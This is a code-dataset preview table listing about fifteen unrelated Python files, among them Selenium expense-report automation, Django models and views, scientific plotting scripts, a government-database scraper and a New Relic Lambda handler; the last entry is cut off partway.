index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
5,600 | 14cb702054b8caaa8899a2a3d8b65aae9b063cb6 | import pandas
import os
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
import json
CONFIG_FILE_NAME = os.path.join(os.path.dirname(__file__), 'input_info.json')
def create_new_report(chrome_driver_inner, report_info_inner):
    """Walk the "create new expense report" wizard.

    Clicks through to the naming page, fills in a report title of the form
    "<new_report_string> - <start_date> - <end_date>", then populates the
    start and end date fields from the config dict.

    :param chrome_driver_inner: live selenium Chrome driver, already on the
        expense-report landing page.
    :param report_info_inner: config dict with keys ``new_report_string``,
        ``start_date`` and ``end_date``.
    """
    driver = chrome_driver_inner
    info = report_info_inner
    driver.find_element_by_id('MainContent_MainActionCreate').click()
    driver.find_element_by_id('MainContent_AAWiz__Next').click()
    title = '{} - {} - {}'.format(info['new_report_string'],
                                  info['start_date'],
                                  info['end_date'])
    name_field = driver.find_element_by_id('MainContent_ClientProjectName')
    name_field.clear()
    name_field.send_keys(title)
    # Start and end date inputs are filled the same way.
    for field_id, value in (('MainContent_StartDate_input', info['start_date']),
                            ('MainContent_EndDate_input', info['end_date'])):
        field = driver.find_element_by_id(field_id)
        field.clear()
        field.send_keys(value)
def execute_expense_report(report_filename=CONFIG_FILE_NAME,
                           report_info=None):
    """Drive the web expense system: for every employee in the reconciliation
    spreadsheet, switch to that user and attach their card transactions to a
    dated expense report (creating the report if needed).

    :param report_filename: path to a JSON config file; read only when
        ``report_info`` is not supplied.
    :param report_info: optional pre-built config dict (overrides the file).
    """
    if report_filename and not report_info:
        with open(report_filename, 'r') as input_file:
            report_info = json.load(input_file)
        # NOTE(review): credentials are blanked here -- presumably redacted
        # placeholders; confirm where real values are meant to come from.
        report_info['password'] = ''
        report_info['user_name'] = ''
    file_name = report_info['reconciliation_report_location']
    excel_file = pandas.ExcelFile(file_name)
    # Parsing with a list of sheet names yields a dict of DataFrames.
    pcard_df = excel_file.parse(excel_file.sheet_names, skiprows=8)
    recon_df = pcard_df['PCard Reconciliation Report']
    names = recon_df['Employee Name'].dropna().unique()
    chrome_driver = webdriver.Chrome(os.path.join(os.path.dirname(__file__), 'chromedriver.exe'))
    did_not_finish_list = []
    finished_users = []
    logon_website = report_info['logon_website']
    chrome_driver.get(logon_website)
    chrome_driver.find_element_by_id('userNameInput').send_keys(report_info['email_address'])
    chrome_driver.find_element_by_id('passwordInput').send_keys(report_info['password'])
    chrome_driver.find_element_by_id('passwordInput').send_keys(Keys.ENTER)
    chosen_names = names
    for current_id, the_name in enumerate(chosen_names):
        chrome_driver.implicitly_wait(0)
        print('Processing user {} of {}, {}'.format(current_id+1, len(chosen_names), the_name))
        # Switch back to the admin account before operating on the next user.
        current_user_dropdown = Select(chrome_driver.find_element_by_id('CurrentUserDropdown'))
        current_user_dropdown.select_by_visible_text(report_info['user_name'])
        configuration_link = chrome_driver.find_element_by_id('topNavToolsConfigurationLink')
        configuration_link.click()
        view_and_edit_users = chrome_driver.find_element_by_id('MainContent_ctl69')
        view_and_edit_users.click()
        # Search for the employee by last name (second whitespace token).
        last_name = chrome_driver.find_element_by_id('MainContent_LName')
        last_name_str = the_name.split()[1]
        last_name.send_keys(last_name_str)
        last_name.send_keys(Keys.ENTER)
        user_tag = chrome_driver.find_element_by_xpath("//nobr[text() = \"{}\"]".format(the_name))
        edit_user = user_tag.find_elements_by_xpath("../..//img[@src='images/16_edit.png']")
        edit_user[0].click()
        switch_user = chrome_driver.find_element_by_link_text('Switch to this User')
        switch_user.click()
        more_items = chrome_driver.find_element_by_id('MainContent_lblWalletMoreItems')
        more_items.click()
        # Tick every credit-card transaction in the wallet feed.
        transaction_list = chrome_driver.find_elements_by_xpath("//*[@class='feed_row-primary']//img[@src='images/16_credit-card.png']")
        for i_val in transaction_list:
            i_val.find_element_by_xpath("../..//input[@type='checkbox']").click()
        try:
            add_content = chrome_driver.find_element_by_id('MainContent_Add')
            add_content.click()
        # BUG FIX: this was a bare `except:` which also swallowed
        # KeyboardInterrupt/SystemExit; narrowed to the same exception the
        # sibling handler below catches.
        except NoSuchElementException:
            did_not_finish_list.append(the_name)
            continue
        chrome_driver.implicitly_wait(int(report_info['wait_time']))
        try:
            add_to_existing = chrome_driver.find_element_by_id('MainContent_MainActionAdd')
            add_to_existing.click()
        except NoSuchElementException:
            did_not_finish_list.append(the_name)
            continue
        chrome_driver.implicitly_wait(0)
        if add_to_existing.get_attribute('disabled') == 'true':
            # No existing report to add to -- create a fresh one.
            create_new_report(chrome_driver, report_info)
        else:
            next_button = chrome_driver.find_element_by_id('MainContent_AAWiz__Next')
            next_button.click()
            selected_report = Select(chrome_driver.find_element_by_id('MainContent_SelectedExpenseReport'))
            try:
                selected_report.select_by_visible_text('{} - {} - {}'.format(report_info['report_executive_string'],
                                                                             report_info['start_date'],
                                                                             report_info['end_date']))
            except NoSuchElementException:
                # Expected report title is absent; back out and create it.
                back_button = chrome_driver.find_element_by_id('MainContent_AAWiz__Back')
                back_button.click()
                create_new_report(chrome_driver, report_info)
        next_button_2 = chrome_driver.find_element_by_id('MainContent_AAWiz__Next')
        next_button_2.click()
        finished_users.append(the_name)
        current_user_dropdown = Select(chrome_driver.find_element_by_id('CurrentUserDropdown'))
        current_user_dropdown.select_by_visible_text(report_info['user_name'])
    print('Did not finish: {}'.format(did_not_finish_list))
if __name__ == '__main__':
execute_expense_report() |
5,601 | e714fe0e27ec9ea5acb3120a4d2114d3d7674fcf | import os
import json
from page import Page
from random import choice
from os.path import join, expanduser
from file_handler import f_read, f_readlines, open_local
import config
class LetterPage(Page):
    """Teletext-style "Letters" page: shows emails received by the bot,
    20 lines per page across pages 200-220.

    NOTE(review): the original indentation was lost in transit; the nesting
    below is a best-effort reconstruction -- verify against upstream.
    """
    def __init__(self, page_num, n):
        # n is the 1-based slice index (which 20-line window to show).
        super(LetterPage, self).__init__(page_num)
        self.title = "Letters"
        self.in_index = False
        self.n = n
        self.tagline = "Email klbscroggsbot@gmail.com and your letter will appear here"
        self.letters = ""
    def background(self):
        """Refresh self.letters; page 1 on KLBFAX additionally polls gmail
        and routes special messages (EVENT/CARD/POINTS) to side effects."""
        self.letters = f_read("emails")
        if config.NAME == "KLBFAX" and self.n==1 and config.has_gmail_login():
            import gmail  # imported lazily: only needed when credentials exist
            details = f_readlines("gmail")
            g = gmail.login(details[0],details[1])
            unread = g.inbox().mail(unread=True)
            for mail in unread:
                mail.fetch()
                # Normalize CRLF and split the body into lines.
                lines = "".join(mail.body.split("\r")).split("\n")
                if lines[0] == "EVENT" and "matthew.scroggs.14@ucl.ac.uk" in mail.fr:
                    # Trusted sender: append the event lines to the events file.
                    try:
                        with open_local('events','a') as f:
                            for line in lines:
                                if line!="EVENT":
                                    f.write(line+"\n")
                        mail.read()
                    except:  # NOTE(review): bare except hides I/O errors
                        pass
                elif lines[0] == "CARD" and "matthew.scroggs.14@ucl.ac.uk" in mail.fr:
                    # Write a card file named by line 1, body from line 2 on.
                    with open('/home/pi/cards/'+lines[1],"w") as f:
                        f.write("\n".join(lines[2:]))
                    mail.read()
                elif "POINTS" in lines[0].upper() and "belgin.seymenoglu.10@ucl.ac.uk" in mail.fr:
                    from points import add_points
                    # Parse the longest leading integer prefix of lines[2]
                    # (skipping a bare "-"); stops at the first non-numeric.
                    length = 1
                    points_to_give = 0
                    while length<=len(lines[2]):
                        try:
                            if lines[2][:length]!="-":
                                points_to_give = int(lines[2][:length])
                            length += 1
                        except:
                            break
                    add_points(lines[1].split("=")[0],points_to_give)
                    mail.read()
                else:
                    # Ordinary letter: hard-wrap at 79 columns and prepend.
                    newletter = ""
                    for line in lines:
                        if line!="":
                            while len(line)>79:
                                newletter += line[:79]+"\n"
                                line=line[79:]
                            newletter+=line+"\n"
                    self.letters=newletter+"\n"+"from "+mail.fr+"\n\n"+self.letters
                    mail.read()
            # Cap the archive at 1000 lines and persist it.
            self.letters = self.letters.split("\n")
            if len(self.letters)>1000:
                self.letters = self.letters[:1000]
            with open_local("emails","w") as f:
                f.write("\n".join(self.letters))
        else:
            self.letters = self.letters.split("\n")
    def generate_content(self):
        """Render this page's 20-line slice with random background bands."""
        letters = self.letters[20*(self.n-1):20*self.n]
        letters = "\n".join(letters)
        # Python 2: decode latin1; on Python 3 `unicode` is absent and the
        # bare except falls through to str().
        try:
            letters = unicode(letters,'latin1')
        except:
            letters = str(letters)
        self.add_title("Have your say",font="size4")
        a = str(self.n)+"/21"  # page-position badge, right-aligned
        self.move_cursor(x=90-len(a))
        self.add_text(a, fg="BLUE", bg="YELLOW")
        self.move_cursor(x=0)
        self.start_random_bg_color()
        for line in letters.split("\n"):
            line = line.rstrip("\n")
            if line == "":
                # Blank line separates letters: switch background band.
                self.end_bg_color()
                self.start_random_bg_color()
            self.add_text(line,fg="BLACK")
            self.add_newline()
        self.end_bg_color()
        if self.n==21:
            self.add_text("~ END OF LETTERS ~")
        else:
            self.add_text("The letters continue on page "+str(200+self.n))
# Pages 200-220: only page 200 appears in the index (listed as "200-220");
# the remaining pages are continuation slices of the same letters buffer.
letters_page1 = LetterPage("200",1)
letters_page1.in_index = True
letters_page1.index_num = "200-220"
letters_page2 = LetterPage("201",2)
letters_page3 = LetterPage("202",3)
letters_page4 = LetterPage("203",4)
letters_page5 = LetterPage("204",5)
letters_page6 = LetterPage("205",6)
letters_page7 = LetterPage("206",7)
letters_page8 = LetterPage("207",8)
letters_page9 = LetterPage("208",9)
letters_page10 = LetterPage("209",10)
letters_page11 = LetterPage("210",11)
letters_page12 = LetterPage("211",12)
letters_page13 = LetterPage("212",13)
letters_page14 = LetterPage("213",14)
letters_page15 = LetterPage("214",15)
letters_page16 = LetterPage("215",16)
letters_page17 = LetterPage("216",17)
letters_page18 = LetterPage("217",18)
letters_page19 = LetterPage("218",19)
letters_page20 = LetterPage("219",20)
letters_page21 = LetterPage("220",21)
|
5,602 | 3b737aaa820da8f70a80480c6404e4d3a9d2262e | """
COMPARISON OPERATORS
"""
__author__ = 'Sol Amour - amoursol@gmail.com'
__twitter__ = '@solamour'
__version__ = '1.0.0'
greaterThan = 10 > 5 # Is '10' greater than '5' ? Evaluates to True
greaterThanOrEqualTo = 10 >= 10 # Is '10' greater than or equal to '10'
# ? Evaluates to True
lessThan = 5 < 10 # Is '5' less than '10' ? Evaluates to True
lessThanOrEqualTo = 5 <= 5 # Is '5' less than or equal to '5' ? Evaluates
# to True
equals = 5 == 5 # Does '5' equal '5' ? Evaluates to True
notEquals = 5 != 10 # Does '5' not equal '10' ? Evaluates to True
x = 2 # Assinging the variable of 'x' a value of '2'
y = 1 < x < 3 # Is '1' less than 'x' (2) is less than 3 ? Evaluates to True
OUT = [greaterThan, greaterThanOrEqualTo, lessThan, lessThanOrEqualTo,
equals, notEquals, y]
|
5,603 | e279ca43ce2c582c702f1c6a0c1acf37eb9bcefe | from django.shortcuts import render
def index(request):
    """Render the munchies fast-food home page with static menus."""
    drinks = ['Pineapple Juice', 'Green Juice', 'Soft Drinks', 'Carlo Rosee Drinks']
    dishes = ['Beef Steak', 'Tomato with Chicken', 'Sausages from Italy', 'Beef Grilled']
    context = {'drinks': drinks, 'dishes': dishes}
    return render(request, 'munchiesfastfood/home.html', context)
|
5,604 | 0ef172ced411213c0f7daccd632f8d5ec97379c3 | from django.apps import AppConfig
class EasyTechConfig(AppConfig):
    """Django application configuration for the ``easy_tech`` app."""
    # Dotted path of the application, as referenced from INSTALLED_APPS.
    name = 'easy_tech'
|
5,605 | f01a1b6d0de4ba685c489af2742159447f943d2d | # -*- coding: utf-8 -*-
"""
Created on Thu May 24 18:18:36 2018
@author: Nicole
"""
from __future__ import division
import Rod
import matplotlib.pyplot as plt
import math
class Truss:
    """One truss member: two nodes joined by a Rod, plus plotting helpers.

    NOTE(review): original indentation was lost in transit; nesting below is
    reconstructed.
    """
    def __init__(self,node1,node2,size,result,ax):
        # node1/node2: endpoint node objects with .x/.y and plot methods.
        # result: analysis result forwarded to the Rod for annotation.
        self.node1=node1
        self.node2=node2
        self.rod=Rod.Rod(node1,node2,result)
        self.size=size
        self.result=result
        self.ax=ax
        # Euclidean member length between the two nodes.
        self.length=math.sqrt((node1.x-node2.x)**2+(node1.y-node2.y)**2)
    def PlotCalculatedTruss(self):
        """Draw nodes, supports, loads, the rod, and the analysis result."""
        self.node1.PlotNode()
        self.node1.PlotSupport()
        self.node1.PlotForce()
        self.node2.PlotNode()
        self.node2.PlotSupport()
        self.node2.PlotForce()
        self.rod.PlotRod()
        self.rod.PlotResult()
    def PlotUncalculatedTruss(self):
        """Same as PlotCalculatedTruss but without the result annotation."""
        self.node1.PlotNode()
        self.node1.PlotSupport()
        self.node1.PlotForce()
        self.node2.PlotNode()
        self.node2.PlotSupport()
        self.node2.PlotForce()
        self.rod.PlotRod()
    def SaveTrussFig(self):
        """Save the current figure to truss.png and display it."""
        plt.savefig('truss.png',dpi=600)
        plt.show()
'''
pud=UnitPostProcess(1.8,1.4,3.4,3.2,1,1,1,0,5,0,0,8,8.0,48.6667)
pud.setfig()
pud.plot()
pud=UnitPostProcess(3.4,3.2,7.4,3.2,0,0,1,1,0,0,0,0,8.0,23.3333)
pud.plot()
pud.savefig()
''' |
5,606 | 26b0a762b8eb30f0ef3c5a914f032c2a7d24f750 | # 12.02.17
"""
nomenclatura
a__b__c
a: parametro
t-temperatura
tm-temperatura minima
tM-temperatura massima
b: intervallo di tempo
a-anno
c: tabella fonte dati
g-giornaliero
"""
import db_02 as DB
def t_tm_tM__a__g(db, anno):
    """Return the daily temperature series for one year.

    :param db: object exposing a sqlite3 cursor as ``db.cur``.
    :param anno: year to select (int or str).
    :return: four parallel lists ``(dates, t, tmin, tmax)`` taken from the
        ``Giornaliero`` table.
    """
    # BUG FIX: the original query used strftime('%Y') with no time-value,
    # which SQLite interprets as 'now' -- so it compared the CURRENT year to
    # `anno` instead of each row's date.  Also switched from string
    # formatting to a bound parameter.
    cmd = """
        SELECT data, t, tmin, tmax
        FROM Giornaliero
        WHERE strftime('%Y', data) = ?
    """
    dati = db.cur.execute(cmd, (str(anno),)).fetchall()
    ldate = []
    lt = []
    ltm = []
    ltM = []
    for data, t, tm, tM in dati:
        ldate.append(data)
        lt.append(t)
        ltm.append(tm)
        ltM.append(tM)
    return ldate, lt, ltm, ltM
if __name__ == '__main__':
db = DB.DB()
db.crea_db()
t_tm_tM__a__g(db, 2017)
|
5,607 | e5c30488c8c1682171c57a11a8ecedc5ccd4d851 | import numpy as np
import matplotlib.pyplot as plt
import sys
import os
from azavg_util import plot_azav
from binormalized_cbar import MidpointNormalize
from diagnostic_reading import ReferenceState
# Compute and plot the meridional Rossby number from azimuthally averaged
# Reynolds-stress data.  Usage: python <script> <run_directory>
dirname = sys.argv[1]
datadir = dirname + '/data/'
plotdir = dirname + '/plots/'
if not os.path.isdir(plotdir):
    os.makedirs(plotdir)
ref = ReferenceState(dirname + '/reference', '')
H_rho = -1./ref.dlnrho  # density scale height from the reference state
# Get grid info
rr, tt, cost, sint, rr_depth, ri, ro, d = np.load(datadir + 'grid_info.npy')
nr, nt = len(rr), len(tt)
H_rho_2d = H_rho.reshape((1, nr))
# Raw Reynolds-stress components, split into prograde (+) and retrograde (-).
vr2_p, vt2_p, vp2_p, vrvp_p, vrvt_p, vtvp_p, \
    vr2_m, vt2_m, vp2_m, vrvp_m, vrvt_m, vtvp_m, fplus, fminus \
    = np.load(datadir + 'rs_raw.npy')
vrvp_t = vrvp_m + vrvp_p
vrvt_t = vrvt_m + vrvt_p
vtvp_t = vtvp_m + vtvp_p
vr2_t = vr2_m + vr2_p
vt2_t = vt2_m + vt2_p
vp2_t = vp2_m + vp2_p
# Total velocity
v2_p = vr2_p + vt2_p + vp2_p
# BUG FIX: the two sums below used vt2_p in place of vt2_m / vt2_t
# (copy-paste error), double-counting the prograde theta component.
v2_m = vr2_m + vt2_m + vp2_m
v2_t = vr2_t + vt2_t + vp2_t
Om = 7.8e-6  # rotation rate [rad/s]
# Convective Rossby number Ro_c = v / (2 Omega H_rho)
ro_p = np.sqrt(v2_p)/(2*Om*H_rho_2d)
ro_m = np.sqrt(v2_m)/(2*Om*H_rho_2d)
ro_t = np.sqrt(v2_t)/(2*Om*H_rho_2d)
# Plot the meridional Rossby number
# NOTE(review): ro_m is plotted while the title and filename say "+"/"p" --
# confirm whether ro_p was intended here.
fig, ax = plt.subplots()
plot_azav(fig, ax, ro_m, rr, cost, sint,
          contours=False, notfloat=False, units='')
plt.title(r'$({\rm{Ro}}_{\rm{c}})_+$',fontsize=16)
plt.tight_layout()
# BUG FIX: save before show(); show() blocks and the figure is empty/closed
# afterwards, so the original saved a blank image.
plt.savefig(plotdir + 'rossby_mer_p.png')
plt.show()
plt.close()
|
5,608 | 9a0e37aaa41f3b21ed7ad11096cd6c5dd0bb8564 | import time
# Block for roughly 60 seconds.
t0 = time.time()
# BUG FIX: the original condition was `abs(t0 - time.time() < 60)`, i.e.
# abs() applied to a *boolean*.  Since t0 - time.time() is always <= 0
# (and therefore always < 60), the loop never terminated.
while abs(t0 - time.time()) < 60:
    pass  # busy-wait preserved; time.sleep(60) would be kinder to the CPU
|
5,609 | 175e8ecdd0c9faa5fc981447f821763e0eb58b4d | import h5py
import numpy as np
from matplotlib import pyplot
from IPython.Shell import IPShellEmbed
# Legacy IPython (<0.11) embedded shell, invoked later for interactive debugging.
ipshell = IPShellEmbed("Dropping to IPython shell")
# SPY/VXX tick data archive covering 2009-05-07 .. 2010-04-27.
filename = "SPY-VXX-20090507-20100427.hdf5"
# Successive experiment windows left in place; only the LAST pair takes
# effect, so the active window is days 0..245 (the full archive).
start_day = 1
end_day = 245
#start_day = 108
#end_day = 111
start_day = 120
end_day = 245
start_day = 1
end_day = 120
start_day = 120
end_day = 180
start_day = 0
end_day = 245
days = end_day - start_day  # number of trading days in the active window
|
5,610 | a1db566f4da16e7725212aeab29e946ef7c1672e | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated migration: adds the QcloudImageInfo and
    QcloudInstanceInfo tables mirroring Tencent Cloud (QCloud) image and
    instance metadata.  verbose_name values are escaped Chinese labels.
    Do not edit applied migrations by hand.
    """

    dependencies = [
        ('home_application', '0019_auto_20170809_1810'),
    ]

    operations = [
        migrations.CreateModel(
            name='QcloudImageInfo',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('image_id', models.CharField(max_length=50, verbose_name='\u955c\u50cfid')),
                ('osname', models.CharField(max_length=50, verbose_name='\u64cd\u4f5c\u7cfb\u7edf\u540d\u79f0')),
                ('image_size', models.CharField(max_length=50, verbose_name='\u64cd\u4f5c\u7cfb\u7edf\u5bb9\u91cf\uff08GiB\uff09')),
                ('image_type', models.IntegerField(verbose_name='\u955c\u50cf\u7c7b\u578b')),
                ('created_time', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u521b\u5efa\u65f6\u95f4')),
                ('image_state', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u72b6\u6001')),
                ('image_source', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u6765\u6e90')),
                ('image_name', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u540d\u79f0')),
                ('image_description', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u8be6\u7ec6\u63cf\u8ff0')),
                ('image_creator', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u521b\u5efa\u8005')),
                ('operation_mask', models.CharField(max_length=50, verbose_name='')),
            ],
            options={
                'db_table': 'qcloud_image_info',
            },
        ),
        migrations.CreateModel(
            name='QcloudInstanceInfo',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('instance_id', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8bid')),
                ('instance_name', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u540d\u79f0')),
                ('instance_type', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u7c7b\u578b')),
                ('cpu', models.CharField(max_length=50, verbose_name='cpu')),
                ('memory', models.CharField(max_length=50, verbose_name='\u5185\u5b58')),
                ('status', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u72b6\u6001')),
                ('zone', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u6240\u5c5e\u5730\u57df')),
                ('instance_charge_type', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u8ba1\u8d39\u6a21\u5f0f')),
                ('private_ip_addresses', models.CharField(max_length=50, verbose_name='\u5185\u7f51ip')),
                ('public_ip_addresses', models.CharField(max_length=50, verbose_name='\u5916\u7f51ip')),
                ('image_id', models.CharField(max_length=50, verbose_name='\u955c\u50cfid')),
                ('os_name', models.CharField(max_length=50, verbose_name='\u64cd\u4f5c\u7cfb\u7edf\u540d\u79f0')),
                ('system_disk_type', models.CharField(max_length=50, verbose_name='\u7cfb\u7edf\u76d8\u7c7b\u578b')),
                ('system_disk_size', models.CharField(max_length=50, verbose_name='\u7cfb\u7edf\u76d8\u5c3a\u5bf8')),
                ('renew_flag', models.CharField(max_length=50, verbose_name='\u81ea\u52a8\u7eed\u8d39\u6807\u8bc6')),
                ('internet_max_bandwidth_out', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u7f51\u7edc\u5e26\u5bbd\u4e0a\u9650')),
                ('internet_charge_type', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u7f51\u7edc\u8ba1\u8d39\u7c7b\u578b')),
                ('created_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='\u5b9e\u4f8b\u521b\u5efa\u65f6\u95f4')),
                ('expired_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='\u5b9e\u4f8b\u5230\u671f\u65f6\u95f4')),
            ],
            options={
                'db_table': 'qcloud_instance_info',
            },
        ),
    ]
|
5,611 | 9d302ff2de8280bd8786794cdd533107d2a458bc | import urllib3
import json
def download(url):
    """Fetch *url* with a mobile-browser header set and return the body.

    Uses urllib3 with a hard-coded mobile Chrome User-Agent and a session
    cookie, prints the HTTP status, and returns the response body decoded
    with the platform default (UTF-8).

    :param url: absolute URL to GET.
    :return: decoded response body (str).
    """
    print('Downloading ', url)
    # FIX: a first userAgent assignment (Android/MIUI) was dead code --
    # immediately overwritten by the value below -- and has been removed.
    userAgent = 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Mobile Safari/537.36'
    AcceptLanguage = 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'
    AcceptEncoding = 'gzip, deflate'
    Accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
    # NOTE(review): session cookie is hard-coded and will expire; refresh it
    # before relying on authenticated responses.
    Cookie = 'JSESSIONID=A58B0B1DC96828832B92EE91D9E92605.7; tuNQaYE2WCOr80S=O43ziCfC7BLZm.F5edsUL84qX_T8DekwZhjFvL0AXMCYWDFH2_2qqyIQwdLwjfJb; tuNQaYE2WCOr80T=4zC94ZgkJ7NBDRsPXe.HrtFd3tXcvwudE41SSD4iUqL2TMsVQSF_QZ8LinHlNDmqOg_SeNEwr7NLRVyTJ7tG81Q310tSQQPTX0GJJDgefw7pPhWCn2BTVLKZ.MM_8iydxo1hNiKsmf7t9C5h3dn5b0DwZgfFZIzR1Ji4dsQdfhFkYTG5rdPQUPR5Y9.SG8jXjtXLxhv98Jx9DkyPYf2HWMJSWhjZlSe1sjjzACwcCozHaqBCvc_6F9mVCbKTdW44GKor91iD_VU2yaig6LwIHC5lVS0hSMTZQVlYPRJiQPf9AdA'
    http = urllib3.PoolManager(num_pools=5, headers={'User-Agent': userAgent, 'Accept - Language': AcceptLanguage,
                                                     'Accept-Encoding': AcceptEncoding, 'Accept': Accept,
                                                     'Proxy-Connection': 'keep-alive',
                                                     'Cache-Control': 'max-age=0',
                                                     'Cookie': Cookie})
    r = http.request('GET', url)
    print(r.status)
    html = r.data.decode()
    return html
if __name__ == '__main__':
    # Crawl the NMPA mobile search API: list pages, then one detail request
    # per record.  Indentation reconstructed (lost in transit).
    demoURL = 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex=1&pageSize=1500'
    demoDetailUrl = 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK=109228'
    # The previous value was a sample; the base below gets the ID appended.
    demoDetailUrl = 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK='
    for i in range(1,10):
        demoURL = 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex='+str(i)+'&pageSize=1500'
        ss = download(demoURL)
        print(ss)
        data = json.loads(ss)
        for item in data:
            # searchK = item['COUNT']
            searchK = item['ID']
            print(item['CONTENT'])
            detailInfoJson = download(demoDetailUrl + str(searchK))
            detailInfo = json.loads(detailInfoJson)
            # NOTE(review): JSON is assembled by string concatenation --
            # any quote/backslash in NAME/CONTENT breaks json.loads below,
            # and if every detail is filtered out the [:-1] strips the '{'.
            # Building a dict and using json.dumps would be safer.
            detailJson = '{'
            for detail in detailInfo:
                if detail['NAME'] != '注':
                    detailJson = detailJson + '"' + detail['NAME'] + '":"' + detail['CONTENT'] + '",'
            detailJson = detailJson[:-1]
            detailJson = detailJson + '}'
            print(detailJson)
            detailData = json.loads(detailJson)
            # print(item['CONTENT'])
|
5,612 | e89600f109335ffdb00c13f617d61496c547ba61 | import requests, os
def lambda_handler(event, context):
    """AWS Lambda entry point: list applications from the New Relic v2 API.

    ``event`` and ``context`` are the standard Lambda arguments; neither is
    used.  The API key is read from the ``newrelic_api_key`` environment
    variable.  Returns the decoded JSON payload.
    """
    print(requests)  # confirms the bundled requests dependency resolved
    api_key = os.environ['newrelic_api_key']
    request_headers = {
        'content-type': 'application/json',
        'Accept-Charset': 'UTF-8',
        'X-api-key': api_key,
    }
    response = requests.get('https://api.newrelic.com/v2/applications.json',
                            headers=request_headers)
    return response.json()
|
5,613 | ede675c971ed233e93c14aa4d2ffb66fe7ba775a | """
This is the hourly animation program. It displays a series of images across the board.
It is hard coded to work with the Sonic images. Adjustments would need to be made to
the y values which are distance traveled. Change sonicFrame < 8 value to the total
number of frames the new animation has.
"""
from runImages import *
def animationDisplay():
    """Play the hourly Sonic run animation across the LED matrix.

    Sonic advances 6 pixels per frame through an 8-frame run cycle; once the
    x offset passes 100 it resets to the left edge and the sprite drops 15
    pixels.  The outer loop ends when the vertical offset reaches 70.
    Hard-coded for the 8-frame SonicRun-*.jpg images (see module docstring).
    """
    matrix.Clear()
    sonicRun = 0    # horizontal (x) offset of the sprite
    sonicFrame = 0  # index within the 8-frame run cycle
    y = 0           # vertical offset; increases as Sonic wraps around
    while y < 70:
        sonicFrame = 0
        if sonicRun >= 100:
            # Wrapped past the right edge: restart at the left, one row down.
            sonicRun = 0
            y = y + 15
        while sonicFrame < 8:
            animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'
            imageDisplay(animationFrame, sonicRun, y)
            time.sleep(0.05)  # ~20 fps
            sonicRun = sonicRun + 6
            sonicFrame = sonicFrame + 1
|
5,614 | 20a238826640099e6c69aaa383c5fa7e9b02b13b | """
Contains derivative computation for BSSN formulation of ET equations.
"""
# first derivative
import cog
# Evolved BSSN variables needing first derivatives.
D = ["alpha", "beta0", "beta1", "beta2",
     "B0", "B1", "B2",
     "chi", "Gt0", "Gt1", "Gt2", "K",
     "gt0", "gt1", "gt2", "gt3", "gt4", "gt5",
     "At0", "At1", "At2", "At3", "At4", "At5"]

# custom functions for code generation in cse.
custom_functions = {'grad': 'grad', 'grad2': 'grad2', 'agrad': 'agrad', 'kograd': 'kograd'}

# Variables needing second derivatives for the RHS.
DD = ["gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "chi",
      "alpha", "beta0", "beta1", "beta2"]

# Variables needing advective derivatives.
AD = ["gt0", "gt1", "gt2", "gt3", "gt4", "gt5",
      "At0", "At1", "At2", "At3", "At4", "At5",
      "alpha", "beta0", "beta1", "beta2", "chi", "Gt0", "Gt1", "Gt2", "K",
      "B0", "B1", "B2"]
# Kreiss-Oliger dissipation applies to the same set as advection.
KO = AD

# Constraint evaluation: first/second derivatives, no gauge variables.
CONSTRAINT_D = ["chi", "Gt0", "Gt1", "Gt2", "K",
                "gt0", "gt1", "gt2", "gt3", "gt4", "gt5",
                "At0", "At1", "At2", "At3", "At4", "At5"]
CONSTRAINT_DD = ["gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "chi"]

# Buffer-name prefixes per derivative operator and direction.
PREFIX_D = ["grad_0_", "grad_1_", "grad_2_"]
PREFIX_AD = ["agrad_0_", "agrad_1_", "agrad_2_"]
PREFIX_KOD = ["kograd_0_", "kograd_1_", "kograd_2_"]
PREFIX_DD = ["grad2_0_0_", "grad2_0_1_", "grad2_0_2_", "grad2_1_1_", "grad2_1_2_", "grad2_2_2_"]

# Flattened buffer-name lists: for each variable, one entry per prefix
# (variable-major order, matching the original nested loops).
FUNC_D_I = [p + f for f in D for p in PREFIX_D]          # first derivs
FUNC_D_IJ = [p + f for f in DD for p in PREFIX_DD]       # second derivs
FUNC_AD_I = [p + f for f in AD for p in PREFIX_AD]       # advective derivs
FUNC_KOD_I = [p + f for f in D for p in PREFIX_KOD]      # Kreiss-Oliger derivs
# Constraint buffers: first derivatives followed by second derivatives.
